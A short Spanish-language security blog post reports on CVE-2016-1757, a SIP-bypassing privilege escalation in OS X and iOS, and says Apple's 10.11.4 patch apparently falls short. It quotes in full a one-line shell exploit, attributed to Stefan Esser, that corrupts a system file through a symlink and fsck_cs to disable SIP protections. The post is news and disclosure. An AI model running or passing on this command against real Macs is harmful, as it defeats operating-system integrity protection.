Hace poco Ian Beer de Google y Pedro Vilaça de SentinelOne nos hablaban de una vulnerabilidad (CVE-2016-1757) que permite la elevación de privilegios local evadiendo SIP y que afectaba a todas las versiones de OS X e iOS, un 0-day muy fácil de explotar mediante spear phishing o un ataque basado en navegador.
Para solucionarlo, Apple publicó esta semana OS X El Capitan 10.11.4 y iOS 9.3 que sin embargo parece que no ha terminado de solucionar el problema. Sirva de ejemplo el código del exploit que hace un par de días publicó el popular Stefan Esser (@i0n1c) y que cabe en... ¡un sólo tweet!:
https://twitter.com/i0n1c/status/714261458851221504
Disable AppleKextExcludeList to pwn SIP on 10.11.4: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
0 comentarios :
Publicar un comentario